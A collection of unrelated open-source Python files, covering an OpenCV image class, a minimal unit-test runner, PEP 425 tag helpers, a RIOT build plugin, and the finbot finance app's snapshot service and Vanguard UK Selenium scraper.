cv.normalize(self.data, self.data, 0, 1, cv.NORM_MINMAX)
self.data = np.uint8(self.data * 255)
```
#### File: jdu_image/jduimage/_imageStructure.py
```python
import cv2 as cv
import numpy as np
from typing import Union, List
from pathlib import Path
class ImageStructure:
"""General purpose high level opencv image class. All operation on instances are inplace."""
def __init__(self, input: Union[str, np.ndarray]):
"""Initialisation of the class.
Parameters
----------
input : str, np.ndarray
Either the path to an image file, or a numpy array.
"""
if not isinstance(input, str) and not isinstance(input, np.ndarray):
raise TypeError("Bad type")
if isinstance(input, str):
self.data = self.__load_image(input)
elif isinstance(input, np.ndarray):
self.data = self.__convert_array(input)
@property
def shape(self) -> List[int]:
"""Shape of the image."""
return self.data.shape
@property
def width(self) -> int:
"""Width of the image"""
return self.shape[1]
@property
def height(self) -> int:
"""Height of the image"""
return self.shape[0]
@property
def dim(self) -> int:
"""Number of dimensions of the image."""
return len(self.shape)
def __load_image(self, path: str) -> np.ndarray:
"""Loads the image from a file, as a color image (BGR).
Parameters
----------
path: str
path to input image
Returns
-------
np.ndarray
Loaded image
"""
if not Path(path).exists():
raise ValueError(f"image at {path} not found")
return cv.imread(path, cv.IMREAD_COLOR)
def __convert_array(self, array: np.ndarray) -> np.ndarray:
"""Converts an array. For the moments only checks the array type and returns it.
Parameters
----------
array: np.ndarray
Input array
Returns
-------
np.ndarray
Converted array
"""
if not isinstance(array, np.ndarray):
raise TypeError("Wrong image type for conversion")
return array
```
#### File: jdu_image/jduimage/_morphologicalMixin.py
```python
import cv2 as cv
import numpy as np
class MorphologicalMixin:
def sharpen(self) -> None:
"""Sharpens the image with 3x3 filter. Only works on 2D images."""
if self.dim != 2:
raise ValueError("Only on 2D images")
filter = np.array([[-1, -1, -1], [-1, 9, -1], [-1, -1, -1]])
self.data = cv.filter2D(self.data, -1, filter)
def open(self, size: int = (5, 5), element: int = cv.MORPH_ELLIPSE) -> None:
"""Performs morphological opening on the image. Only works on 2D images.
Parameters
----------
size: int, optional
Size of the kernel (default is (5, 5))
element: int, optional
Structural element (default is cv.MORPH_ELLIPSE)
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
kernel = cv.getStructuringElement(element, size)
self.data = cv.morphologyEx(self.data, cv.MORPH_OPEN, kernel)
def close(self, size: int = (5, 5), element: int = cv.MORPH_ELLIPSE) -> None:
"""Performs morphological closing on the image. Only works on 2D images.
Parameters
----------
size: int, optional
Size of the kernel (default is (5, 5)
)
element: int, optional
Structural element (default is cv.MORPH_ELLIPSE)
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
kernel = cv.getStructuringElement(element, size)
self.data = cv.morphologyEx(self.data, cv.MORPH_CLOSE, kernel)
def dilate(self, size: int = (5, 5), element: int = cv.MORPH_ELLIPSE) -> None:
"""Performs morphological dilatation on the image. Only works on 2D images.
Parameters
----------
size: int, optional
Size of the kernel (default is (5, 5))
element: int, optional
Structural element (default is cv.MORPH_ELLIPSE)
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
kernel = cv.getStructuringElement(element, size)
self.data = cv.morphologyEx(self.data, cv.MORPH_DILATE, kernel)
def erode(self, size: int = (5, 5), element: int = cv.MORPH_ELLIPSE) -> None:
"""Performs morphological erosion on the image. Only works on 2D images.
Parameters
----------
size: int, optional
Size of the kernel (default is (5,5))
element: int, optional
Structural element (default is cv.MORPH_ELLIPSE)
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
kernel = cv.getStructuringElement(element, size)
self.data = cv.morphologyEx(self.data, cv.MORPH_ERODE, kernel)
def tophat(self, size: int = 5, element: int = cv.MORPH_ELLIPSE) -> None:
"""Performs morphological tophat on the image. Only works on 2D images.
Parameters
----------
size: int, optional
Size of the kernel (default is 5)
element: int, optional
Structural element (default is cv.MORPH_ELLIPSE)
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
kernel = cv.getStructuringElement(element, (size, size))
self.data = cv.morphologyEx(self.data, cv.MORPH_TOPHAT, kernel)
def algebric_open(self, size: int = 5, step: int = 5) -> None:
"""Performs morphological algebric opening on the image. Only works on 2D images.
Parameters
----------
size: int, optional
Structural element size
step: int, optional
Angle step
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
result = np.zeros(self.shape, dtype=np.uint8)
for a in range(0, 180, step):
kernel = line_strel(size=size, angle=a)
temp = cv.morphologyEx(self.data, cv.MORPH_OPEN, kernel).astype(np.uint8)
result = np.maximum(result, temp)
self.data = result
def algebric_dilate(self, size: int = 5, step: int = 5) -> None:
"""Performs morphological algebric dilatation on the image. Only works on 2D images.
Parameters
----------
size: int, optional
Structural element size
step: int, optional
Angle step
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
result = np.zeros(self.shape, dtype=np.uint8)
for a in range(0, 180, step):
kernel = line_strel(size=size, angle=a)
temp = cv.morphologyEx(self.data, cv.MORPH_DILATE, kernel).astype(np.uint8)
result = np.maximum(result, temp)
self.data = result
def blackhat(self, size: int = 5, element: int = cv.MORPH_ELLIPSE) -> None:
"""Performs morphological blackhat on the image. Only works on 2D images.
Parameters
----------
size: int, optional
Size of the kernel (default is 5)
element: int, optional
Structural element (default is cv.MORPH_ELLIPSE)
"""
if self.dim != 2:
raise ValueError("Only on 2D images")
kernel = cv.getStructuringElement(element, (size, size))
self.data = cv.morphologyEx(self.data, cv.MORPH_BLACKHAT, kernel)
def gabor(self) -> None:
"""Applies gabor filter to the image."""
ksize = 21
thetas = [-45]
filters = []
for a in thetas:
kernel = cv.getGaborKernel([ksize, ksize], 40, a, 25, 1)
filters.append(kernel)
result = np.zeros(self.shape, dtype=np.uint8)
for kernel in filters:
imgfiltered = cv.filter2D(self.data, -1, kernel)
result = np.maximum(result, imgfiltered)
self.data = result
def edges(self, thres1: int = 100, thres2: int = 200) -> None:
"""Finds the edges on the image with Canny algorithm.
Parameters
----------
thres1: int, optional
Low threshold (default is 100)
thres2: int, optional
High threshold (default is 200)
"""
self.data = cv.Canny(image=self.data, threshold1=thres1, threshold2=thres2)
def sobel(self) -> None:
self.data = cv.Sobel(src=self.data, ddepth=cv.CV_8UC1, dx=1, dy=1, ksize=3)
def line_strel(size: int, angle: float) -> np.ndarray:
"""Creates a linear structural element, with given length and rotation angle.
Parameters
----------
size: int
Length of the structural element when laying flat
angle: float
Rotation angle of the line in degrees
Returns
-------
np.ndarray
Square array containing the linear structural element
"""
if size % 2 != 1:
raise ValueError("Size must be odd")
line = np.zeros((size, size))
line[line.height // 2, :] = 1
center = (size // 2, size // 2)
tform = cv.getRotationMatrix2D(center, angle, 1)
kernel = cv.warpAffine(line, tform, line.shape)
return (kernel * 255).astype(np.uint8)
```
#### File: jdu_image/jduimage/_outputMixin.py
```python
import cv2 as cv
from pathlib import Path
class OutputMixin:
def show(self, label: str = "", height: int = 0, width: int = 0) -> None:
"""Displays the image to the screen.
Parameters
----------
label: str, optional
Title of the window
height: int, optional
Height of the image for display (default is 0)
width: int, optional
Width of the image for display (default is 0)
"""
display = self.deepcopy()
if height != 0:
display.resize("height", height)
elif width != 0:
display.resize("width", width)
cv.imshow(label, display.data)
cv.waitKey(0)
def save(self, path: str) -> None:
"""
Saves the image to a file. All folder creation is handled by the method.
Parameters
----------
path: str
Path to output image. Can be absolute or relative. Recognised file types are {"jpg","jpeg","png"}
"""
if path.split(".")[-1] not in ["jpg", "jpeg", "png"]:
raise ValueError("Unrecognised image file type")
folder = "."
substrings = path.replace("\\", "/").split("/")
folder = "/".join(substrings[0:-1])
if folder and not Path(folder).exists():
Path(folder).mkdir(parents=True, exist_ok=True)
cv.imwrite(path, self.data)
```
|
{
"source": "jeandemeusy/jdu_unit",
"score": 2
}
|
#### File: jdu_unit/jduunit/unittest.py
```python
from .testcase import TestCase
import inspect, time
from pathlib import Path
import sys, subprocess
from jduargs import ArgumentParser
class TestProgram:
def __init__(self, module: str = "__main__"):
if type(module) == type(""):
self.module = __import__(module)
for part in module.split(".")[1:]:
self.module = getattr(self.module, part)
else:
self.module = module
if len(sys.argv) > 1:
self.verbose = sys.argv[1] == "-d"
else:
self.verbose = 0
self.prefix = "test_"
self.classes = inspect.getmembers(self.module, inspect.isclass)
self.filename = Path(self.module.__file__).name
self.own_methods = [f for f in dir(TestCase) if callable(getattr(TestCase, f))]
self._run_tests()
def _run_tests(self):
n_methods = 0
n_fails = 0
start_t = time.time()
for c in self.classes:
class_name = c[0]
class_address = c[1]
methods = self._get_class_methods(class_address)
print(f"from {class_name} ({self.filename})")
max_len = max([len(m) for m in methods]) - len(self.prefix)
n_methods += len(methods)
n_fails = 0
for m in methods:
try:
getattr(class_address(), m)()
except AssertionError as err:
error_str = f"({err})"
else:
error_str = ""
res_str, short = self._handle_error(error_str)
n_fails += error_str != ""
if self.verbose:
print(f" {m[5:]:{max_len}s} ... {res_str} {error_str}")
else:
print(short, end="")
end_t = time.time()
if not self.verbose:
print("")
print("-" * 60)
print(f"Ran {n_methods} tests in {end_t-start_t:.3f}s")
if n_fails == 0:
print("\033[32m\033[1mSUCCESS\033[0m\n")
else:
print(f"\033[31m\033[1mFAILED (failures={n_fails})\033[0m\n")
def _get_class_methods(self, class_address):
return [
func
for func in dir(class_address)
if callable(getattr(class_address, func))
and func.startswith(self.prefix)
and func not in self.own_methods
]
def _handle_error(self, err_str):
if err_str != "":
res_str = "fail"
short = "x"
else:
res_str = "ok"
short = "."
return res_str, short
main = TestProgram
if __name__ == "__main__":
parser = ArgumentParser("Performs unit tests inside test_*.py files.")
parser.add("display", "d", bool, False, help="Increase level of verbosity")
parser.add("path", "p", str, False, help="Folder containing test_*.py files")
parser.compile(sys.argv[1:])
p = Path(parser["path"]).glob("*.py")
files = [x for x in p if x.is_file() and x.stem[:5] == "test_"]
verbose_str = "-d" if parser["display"] else ""
for file in files:
subprocess.call(f"python {file} {verbose_str}")
```
|
{
"source": "jeandet/mesonpep517",
"score": 2
}
|
#### File: mesonpep517/mesonpep517/pep425tags.py
```python
import distutils.util
import platform
import sys
import sysconfig
import warnings
def get_abbr_impl():
"""Return abbreviated implementation name."""
impl = platform.python_implementation()
if impl == "PyPy":
return "pp"
elif impl == "Jython":
return "jy"
elif impl == "IronPython":
return "ip"
elif impl == "CPython":
return "cp"
raise LookupError("Unknown Python implementation: " + impl)
def get_abi_tag():
"""Return the ABI tag based on SOABI (if available) or emulate SOABI
(CPython 2, PyPy)."""
soabi = get_config_var("SOABI")
impl = get_abbr_impl()
if not soabi and impl in ("cp", "pp") and hasattr(sys, "maxunicode"):
d = ""
m = ""
u = ""
precond = impl == "cp"
if get_flag("Py_DEBUG", hasattr(sys, "gettotalrefcount"), warn=precond):
d = "d"
precond = impl == "cp" and sys.version_info < (3, 3)
if sys.version_info < (3, 8) and get_flag(
"WITH_PYMALLOC", (impl == "cp"), warn=precond
):
m = "m"
precond = impl == "cp" and sys.version_info < (3, 8)
if sys.version_info < (3, 3) and get_flag(
"Py_UNICODE_SIZE",
(sys.maxunicode == 0x10FFFF),
expected=4,
warn=precond,
):
u = "u"
abi = "%s%s%s%s%s" % (impl, get_impl_ver(), d, m, u)
elif soabi and soabi.startswith("cpython-"):
abi = "cp" + soabi.split("-")[1]
elif soabi:
abi = soabi.replace(".", "_").replace("-", "_")
else:
abi = None
return abi
def get_config_var(var, default=None):
"""Return value of given sysconfig variable or given default value, if it
is not set."""
try:
return sysconfig.get_config_var(var)
except IOError as e: # pip Issue #1074
warnings.warn("{0}".format(e), RuntimeWarning)
return default
def get_flag(var, fallback, expected=True, warn=True):
"""Use a fallback method for determining SOABI flags if the needed config
var is unset or unavailable."""
val = get_config_var(var)
if val is None:
if warn:
warnings.warn(
"Config variable '{0}' is unset, Python ABI tag may "
"be incorrect".format(var),
RuntimeWarning,
2,
)
return fallback
return val == expected
def get_impl_ver():
"""Return implementation version."""
impl_ver = get_config_var("py_version_nodot")
if not impl_ver:
impl_ver = "{}{}".format(*sys.version_info[:2])
return impl_ver
def get_platform_tag():
"""Return the PEP-425 compatible platform tag."""
return distutils.util.get_platform().replace("-", "_").replace(".", "_")
```
|
{
"source": "jeandouglasdealmeida/python_tdd_tarefa",
"score": 4
}
|
#### File: jeandouglasdealmeida/python_tdd_tarefa/5.py
```python
import unittest
class Area():
def quadrada(self):
return self.lado1 * self.lado2
def cubica(self):
return self.lado1 * self.lado2 * self.lado3
class MyCalcTest(unittest.TestCase):
def testAreaQuadrada(self):
area = Area()
area.lado1 = 3
area.lado2 = 9
self.assertEqual(27, area.quadrada())
def testAreaCubica(self):
area = Area()
area.lado1 = 3
area.lado2 = 6
area.lado3 = 2
self.assertEqual(36, area.cubica())
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jeandudey/riotgear",
"score": 2
}
|
#### File: plugins/builder/plugin.py
```python
from riotgear.plugin import BasePlugin
import subprocess
import multiprocessing # CPU count
import os
from pathlib import Path
class BuildPlugin(BasePlugin):
def __init__(self,
board=None,
application=None,
jobs=None,
docker=False):
self.board = board
if application is not None:
app_path = Path(application)
else:
app_path = Path.cwd()
if not self._is_application(app_path):
print("No RIOT application found")
return
self.application = app_path
core_count = multiprocessing.cpu_count()
self.jobs = jobs if jobs is not None else core_count
self.use_docker = docker
def _is_application(self, path):
makefile = path / "Makefile"
return makefile.is_file()
def entry(self):
call_args = ['BOARD={}'.format(self.board)]
call_args.append("-j{}".format(self.jobs))
if self.use_docker:
call_args.append("BUILD_IN_DOCKER=1")
call_args.append("DOCKER_MAKE_ARGS=-j{}".format(self.jobs))
self.build(call_args)
def build(self, call_args):
call = ['make', 'all']
call.extend(call_args)
subprocess.call(call, cwd=self.application)
```
|
{
"source": "jean-edouard-boulanger/finbot",
"score": 2
}
|
#### File: appwsrv/blueprints/base.py
```python
from finbot.core.web_service import Route
from finbot.core import environment
from flask import Blueprint
API_V1 = Route("/api/v1")
base_api = Blueprint("api", __name__)
@base_api.route(API_V1.healthy(), methods=["GET"])
def healthy():
return {"healthy": True}
@base_api.route(API_V1.system_report(), methods=["GET"])
def get_system_report():
return {
"system_report": {
"finbot_version": "0.0.1",
"runtime": environment.get_finbot_runtime(),
}
}
```
#### File: apps/snapwsrv/snapwsrv.py
```python
from finbot.apps.snapwsrv.schema import (
TakeSnapshotRequest,
TakeSnapshotResponse,
SnapshotResultsCount,
SnapshotSummary,
)
from finbot.clients.finbot import FinbotClient, LineItem
from finbot.providers.plaid_us import pack_credentials as pack_plaid_credentials
from finbot.core import secure, utils, fx_market, tracer, environment
from finbot.core.utils import unwrap_optional, format_stack
from finbot.core.db.session import Session
from finbot.core.logging import configure_logging
from finbot.core.web_service import service_endpoint, ApplicationErrorData
from finbot.core.serialization import pretty_dump
from finbot.model import (
UserAccount,
UserAccountSnapshot,
SnapshotStatus,
LinkedAccount,
LinkedAccountSnapshotEntry,
SubAccountSnapshotEntry,
SubAccountItemSnapshotEntry,
SubAccountItemType,
XccyRateSnapshotEntry,
)
from flask import Flask
from flask_pydantic import validate
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker, joinedload
from concurrent.futures import ThreadPoolExecutor
from decimal import Decimal
from dataclasses import dataclass
from typing import Optional, Tuple, Any
from copy import deepcopy
import logging
import json
FINBOT_ENV = environment.get()
configure_logging(FINBOT_ENV.desired_log_level)
db_engine = create_engine(FINBOT_ENV.database_url)
db_session = Session(scoped_session(sessionmaker(bind=db_engine)))
tracer.configure(
identity="snapwsrv", persistence_layer=tracer.DBPersistenceLayer(db_session)
)
app = Flask(__name__)
@app.teardown_appcontext
def cleanup_context(*args, **kwargs):
db_session.remove()
class SnapshotTreeVisitor(object):
def visit_account(self, account, errors):
pass
def visit_sub_account(self, account, sub_account, balance):
pass
def visit_item(self, account, sub_account, item_type, item):
pass
def visit_snapshot_tree(raw_snapshot, visitor):
def balance_has_priority(data):
if data["line_item"] == "balances":
return 0
return 1
def iter_errors(account_data):
if "error" in account_data:
yield {"scope": "linked_account", "error": account_data["error"]}
return
for data_entry in account_data["financial_data"]:
if "error" in data_entry:
yield {
"scope": f"linked_account.{data_entry['line_item']}",
"error": data_entry["error"],
}
for account in raw_snapshot:
real_account = {"id": account["account_id"], "provider": account["provider"]}
account_errors = list(iter_errors(account["data"]))
visitor.visit_account(real_account, account_errors)
if account_errors:
continue
for entry in sorted(
account["data"]["financial_data"], key=balance_has_priority
):
line_item = entry["line_item"]
for result in entry["results"]:
sub_account = deepcopy(result["account"])
if line_item == "balances":
visitor.visit_sub_account(
real_account, sub_account, result["balance"]
)
elif line_item == "assets":
for asset in result["assets"]:
visitor.visit_item(
real_account,
sub_account,
SubAccountItemType.Asset,
deepcopy(asset),
)
elif line_item == "liabilities":
for liability in result["liabilities"]:
visitor.visit_item(
real_account,
sub_account,
SubAccountItemType.Liability,
deepcopy(liability),
)
class XccyCollector(SnapshotTreeVisitor):
def __init__(self, target_ccy):
self.target_ccy = target_ccy
self.xccys = set()
def visit_sub_account(self, account, sub_account, balance):
if sub_account["iso_currency"] != self.target_ccy:
self.xccys.add(
fx_market.Xccy(
domestic=sub_account["iso_currency"], foreign=self.target_ccy
)
)
class CachedXccyRatesGetter(object):
def __init__(self, xccy_rates):
self.xccy_rates = xccy_rates
def __call__(self, xccy: fx_market.Xccy):
if xccy.foreign == xccy.domestic:
return 1.0
return self.xccy_rates[xccy]
class SnapshotBuilderVisitor(SnapshotTreeVisitor):
def __init__(self, snapshot: UserAccountSnapshot, xccy_rates_getter, target_ccy):
self.snapshot = snapshot
self.xccy_rates_getter = xccy_rates_getter
self.target_ccy = target_ccy
self.linked_accounts: dict[
int, LinkedAccountSnapshotEntry
] = {} # linked_account_id -> account
self.sub_accounts: dict[
Tuple[str, str], SubAccountSnapshotEntry
] = {} # link_account_id, sub_account_id -> sub_account
self.results_count = SnapshotResultsCount(total=0, failures=0)
def visit_account(self, account, errors):
snapshot = self.snapshot
account_id = account["id"]
assert account_id not in self.linked_accounts
linked_account_entry = LinkedAccountSnapshotEntry(linked_account_id=account_id)
linked_account_entry.success = not bool(errors)
self.results_count.total += 1
if errors:
self.results_count.failures += 1
linked_account_entry.failure_details = errors
snapshot.linked_accounts_entries.append(linked_account_entry)
self.linked_accounts[account_id] = linked_account_entry
def visit_sub_account(self, account, sub_account, balance):
account_id = account["id"]
linked_account = self.linked_accounts[account_id]
sub_account_id = sub_account["id"]
assert sub_account_id not in self.sub_accounts
sub_account_entry = SubAccountSnapshotEntry(
sub_account_id=sub_account_id,
sub_account_ccy=sub_account["iso_currency"],
sub_account_description=sub_account["name"],
sub_account_type=sub_account["type"],
)
linked_account.sub_accounts_entries.append(sub_account_entry)
self.sub_accounts[(account_id, sub_account_id)] = sub_account_entry
def visit_item(self, account, sub_account, item_type, item):
linked_account_id = account["id"]
sub_account_id = sub_account["id"]
sub_account_entry = self.sub_accounts[(linked_account_id, sub_account_id)]
item_value = item["value"]
new_item = SubAccountItemSnapshotEntry(
item_type=item_type,
name=item["name"],
item_subtype=item["type"],
units=item.get("units"),
value_sub_account_ccy=item_value,
value_snapshot_ccy=item_value
* self.xccy_rates_getter(
fx_market.Xccy(
domestic=sub_account["iso_currency"], foreign=self.target_ccy
)
),
)
sub_account_entry.items_entries.append(new_item)
@dataclass
class AccountSnapshotRequest:
account_id: int
provider_id: str
credentials_data: dict[Any, Any]
line_items: list[LineItem]
account_metadata: Optional[str] = None
tracer_context: Optional[tracer.FlatContext] = None
def dispatch_snapshot_entry(snap_request: AccountSnapshotRequest):
try:
logging.info(
f"starting snapshot for account_id={snap_request.account_id}'"
f" provider_id={snap_request.provider_id}"
)
finbot_client = FinbotClient(FINBOT_ENV.finbotwsrv_endpoint)
account_snapshot = finbot_client.get_financial_data(
provider=snap_request.provider_id,
credentials_data=snap_request.credentials_data,
line_items=snap_request.line_items,
account_metadata=snap_request.account_metadata,
tracer_context=snap_request.tracer_context,
)
logging.info(
f"snapshot complete for for account_id={snap_request.account_id}'"
f" provider_id={snap_request.provider_id}"
)
return snap_request, account_snapshot
except Exception as e:
trace = format_stack(e)
logging.warning(
f"fatal error while taking snapshot for account_id={snap_request.account_id}"
f" provider_id={snap_request.provider_id}"
f" error: {e}"
f" trace:\n{trace}"
)
return snap_request, ApplicationErrorData.from_exception(e)
def get_credentials_data(linked_account: LinkedAccount, user_account: UserAccount):
assert linked_account.encrypted_credentials is not None
credentials = json.loads(
secure.fernet_decrypt(
linked_account.encrypted_credentials.encode(),
FINBOT_ENV.secret_key.encode(),
).decode()
)
if linked_account.provider_id == "plaid_us":
logging.info(credentials)
return pack_plaid_credentials(credentials, user_account.plaid_settings)
return credentials
def take_raw_snapshot(user_account: UserAccount, linked_accounts: Optional[list[int]]):
with ThreadPoolExecutor(max_workers=4) as executor:
logging.info("initializing accounts snapshot requests")
requests = [
AccountSnapshotRequest(
account_id=linked_account.id,
provider_id=linked_account.provider_id,
credentials_data=get_credentials_data(linked_account, user_account),
line_items=[LineItem.Balances, LineItem.Assets, LineItem.Liabilities],
account_metadata=f"{linked_account.account_name} (id: {linked_account.id})",
tracer_context=tracer.propagate(),
)
for linked_account in user_account.linked_accounts
if not linked_account.deleted
and not linked_account.frozen
and (not linked_accounts or linked_account.id in linked_accounts)
]
logging.info(f"starting snapshot with {len(requests)} request(s)")
snapshot_entries = executor.map(dispatch_snapshot_entry, requests)
logging.info("complete snapshot taken")
return [
{
"provider": snap_request.provider_id,
"account_id": snap_request.account_id,
"data": account_snapshot,
}
for snap_request, account_snapshot in snapshot_entries
]
def validate_fx_rates(rates: dict[fx_market.Xccy, Optional[float]]):
missing_rates = [str(pair) for (pair, rate) in rates.items() if rate is None]
if missing_rates:
raise RuntimeError(
f"rate is missing for the following FX pair(s): {', '.join(missing_rates)}"
)
def take_snapshot_impl(
user_account_id: int, linked_accounts: Optional[list[int]]
) -> SnapshotSummary:
logging.info(
f"fetching user information for"
f" user_account_id={user_account_id}"
f" linked_accounts={linked_accounts}"
)
tracer.current().set_input(
{"user_account_id": user_account_id, "linked_accounts": linked_accounts}
)
user_account = (
db_session.query(UserAccount)
.options(joinedload(UserAccount.linked_accounts))
.options(joinedload(UserAccount.settings))
.options(joinedload(UserAccount.plaid_settings))
.filter_by(id=user_account_id)
.first()
)
logging.info(
f"starting snapshot for user account "
f"linked to {len(user_account.linked_accounts)} external accounts"
)
requested_ccy = user_account.settings.valuation_ccy
logging.info(f"requested valuation currency is {requested_ccy}")
with db_session.persist(UserAccountSnapshot()) as new_snapshot:
new_snapshot.status = SnapshotStatus.Processing
new_snapshot.requested_ccy = requested_ccy
new_snapshot.user_account_id = user_account_id
new_snapshot.start_time = utils.now_utc()
new_snapshot.trace_guid = tracer.context_identifier()
tracer.milestone("blank snapshot created", output={"id": new_snapshot.id})
with tracer.sub_step("raw snapshot") as step:
raw_snapshot = take_raw_snapshot(
user_account=user_account, linked_accounts=linked_accounts
)
logging.debug(pretty_dump(raw_snapshot))
step.set_output(raw_snapshot)
with tracer.sub_step("fetch currency pairs") as step:
xccy_collector = XccyCollector(requested_ccy)
visit_snapshot_tree(raw_snapshot, xccy_collector)
step.set_input(xccy_collector.xccys)
xccy_rates = fx_market.get_rates(xccy_collector.xccys)
step.set_output(xccy_rates)
logging.info("adding cross currency rates to snapshot")
with db_session.persist(new_snapshot):
new_snapshot.xccy_rates_entries.extend(
[
XccyRateSnapshotEntry(
xccy_pair=str(xccy), rate=Decimal(unwrap_optional(rate))
)
for xccy, rate in xccy_rates.items()
]
)
logging.info("building final snapshot")
snapshot_builder = SnapshotBuilderVisitor(
new_snapshot, CachedXccyRatesGetter(xccy_rates), new_snapshot.requested_ccy
)
with db_session.persist(new_snapshot):
visit_snapshot_tree(raw_snapshot, snapshot_builder)
new_snapshot.status = SnapshotStatus.Success
new_snapshot.end_time = utils.now_utc()
return SnapshotSummary(
identifier=new_snapshot.id,
start_time=new_snapshot.start_time,
end_time=new_snapshot.end_time,
results_count=snapshot_builder.results_count,
)
@app.route("/healthy", methods=["GET"])
@service_endpoint()
def healthy():
return {"healthy": True}
@app.route("/snapshot/<user_account_id>/take", methods=["POST"])
@service_endpoint()
@validate()
def take_snapshot(user_account_id: int, body: TakeSnapshotRequest):
return TakeSnapshotResponse(
snapshot=take_snapshot_impl(
user_account_id=user_account_id, linked_accounts=body.linked_accounts
)
)
```
#### File: finbot/core/utils.py
```python
import stackprinter
from typing import TypeVar, Optional, Any, Callable, Type, Iterator
from pytz import timezone
from datetime import datetime
from dataclasses import dataclass, field, asdict
from contextlib import contextmanager
import functools
def now_utc() -> datetime:
return datetime.now(timezone("UTC"))
def swallow_exc(
*exc_types: Type[BaseException], default: Optional[Any] = None
) -> Callable[..., Any]:
def decorator(func: Callable[..., Any]) -> Callable[..., Any]:
@functools.wraps(func)
def impl(*args: Any, **kwargs: Any) -> Any:
try:
return func(*args, **kwargs)
except exc_types:
return default
return impl
return decorator
def fully_qualified_type_name(obj: Any) -> str:
t = type(obj)
return f"{t.__module__}.{t.__qualname__}"
T = TypeVar("T")
def unwrap_optional(val: Optional[T]) -> T:
assert val is not None
return val
@dataclass
class StackPrinterSettings:
show_vals: Optional[str] = field(default_factory=lambda: "all")
style: str = field(default_factory=lambda: "plaintext")
def as_kwargs(self) -> dict[str, Any]:
return asdict(self)
def clone(self) -> "StackPrinterSettings":
return StackPrinterSettings(**asdict(self))
STACK_PRINTER_SETTINGS = StackPrinterSettings()
def configure_stack_printer(**kwargs: Any) -> None:
global STACK_PRINTER_SETTINGS
STACK_PRINTER_SETTINGS = StackPrinterSettings(**kwargs)
def _get_stack_printer_settings() -> StackPrinterSettings:
global STACK_PRINTER_SETTINGS
return STACK_PRINTER_SETTINGS
@contextmanager
def scoped_stack_printer_configuration(**kwargs: Any) -> Iterator[None]:
old_settings = _get_stack_printer_settings().clone()
try:
configure_stack_printer(**kwargs)
yield
finally:
configure_stack_printer(**old_settings.as_kwargs())
def format_stack(thing: Optional[Exception] = None, **kwargs: Any) -> str:
sp_settings = _get_stack_printer_settings()
output: str = stackprinter.format(thing, **{**sp_settings.as_kwargs(), **kwargs})
return output
```
#### File: finbot/providers/vanguard_uk.py
```python
from finbot.providers.selenium_based import SeleniumBased
from finbot.providers.support.selenium import SeleniumHelper
from finbot.providers.errors import AuthenticationFailure
from finbot import providers
from finbot.core.utils import swallow_exc
from selenium.webdriver.common.by import By
from selenium.common.exceptions import StaleElementReferenceException
from selenium.webdriver.remote.webelement import WebElement
from price_parser import Price # type: ignore
from typing import Any, Optional, Iterator
from datetime import datetime, timedelta
from copy import deepcopy
import contextlib
import json
import uuid
BASE_URL = "https://secure.vanguardinvestor.co.uk"
class Credentials(object):
def __init__(self, username: str, password: str) -> None:
self.username = username
self.password = password
@property
def user_id(self) -> str:
return self.username
@staticmethod
def init(data: dict[Any, Any]) -> "Credentials":
return Credentials(data["username"], data["password"])
class Api(SeleniumBased):
def __init__(self) -> None:
super().__init__()
self.home_url: Optional[str] = None
self.account_data: Optional[list[dict[str, Any]]] = None
def _go_home(self) -> None:
assert self.home_url is not None
if self.browser.current_url == self.home_url:
return
self._do.get(self.home_url)
def authenticate(self, credentials: Credentials) -> None:
def extract_accounts(context_data: dict[str, Any]) -> list[dict[str, Any]]:
accounts = []
for account in context_data["Accounts"]:
for entry in account["SubAccounts"]:
accounts.append(
{
"description": {
"id": entry["SubAccountId"].strip(),
"name": entry["PreferredName"].strip(),
"iso_currency": "GBP",
"type": "investment",
},
"home_url": entry["HomepageUrl"],
}
)
return accounts
browser = self.browser
browser.get(f"{BASE_URL}/Login")
auth_form = self._do.wait_element(By.CSS_SELECTOR, "form.form-login")
user_input, password_input, *_ = auth_form.find_elements(By.TAG_NAME, "input")
user_input.send_keys(credentials.<PASSWORD>)
password_input.send_keys(<PASSWORD>)
auth_form.find_element(By.CSS_SELECTOR, "div.submit button").click()
self._do.assert_success(
_is_logged_in, lambda _: _get_login_error(auth_form), _report_auth_error
)
self.home_url = self.browser.current_url
self.account_data = extract_accounts(
json.loads(
self._do.find(By.XPATH, "//*[@data-available-context]").get_attribute(
"data-available-context"
)
)
)
def _get_account_balance(self, account: dict[str, Any]) -> providers.BalanceEntry:
dashboard_url = f"{BASE_URL}{account['home_url']}/Dashboard"
self._do.get(dashboard_url)
value_cell = self._do.wait_element(
By.CSS_SELECTOR, "section.portfolio-header div.col-value div.value"
)
account_description: providers.Account = deepcopy(account["description"])
account_balance = Price.fromstring(value_cell.text.strip()).amount_float
assert account_balance is not None
return {
"account": account_description,
"balance": account_balance,
}
def get_balances(self) -> providers.Balances:
assert self.account_data is not None
return {
"accounts": [
self._get_account_balance(account) for account in self.account_data
]
}
def _get_account_assets(self, account: dict[str, Any]) -> providers.AssetEntry:
assets_url = f"{BASE_URL}{account['home_url']}/Investments/Holdings"
self._do.get(assets_url)
self._do.wait_element(
By.CSS_SELECTOR, "div.toggle-switch span.label-one"
).click()
investments_table = self._do.wait_element(
By.CSS_SELECTOR, "table.table-investments-detailed"
)
all_assets: list[providers.Asset] = []
for section in investments_table.find_elements(
By.CSS_SELECTOR, "tbody.group-content"
):
group_row = section.find_element(By.CSS_SELECTOR, "tr.group-row")
product_type = group_row.text.strip().split()[0].lower()
product_rows = _get_product_rows(section, timedelta(seconds=60))
for product_row in product_rows:
all_assets.append(_extract_asset(product_type, product_row))
account_description: providers.Account = deepcopy(account["description"])
return {"account": account_description, "assets": all_assets}
def get_assets(self) -> providers.Assets:
assert self.account_data is not None
return {
"accounts": [
self._get_account_assets(account) for account in self.account_data
]
}
class _StalenessDetector(object):
def __init__(self, browser_helper: SeleniumHelper):
self._browser_helper = browser_helper
self._marker = str(uuid.uuid4())
def mark_visited(self, element: WebElement) -> None:
self._browser_helper.execute_script(
f"arguments[0].innerHTML = '{self._marker}'", element
)
def wait_refreshed(self, element: WebElement) -> None:
self._browser_helper.wait_cond(lambda _: element.text.strip() != self._marker)
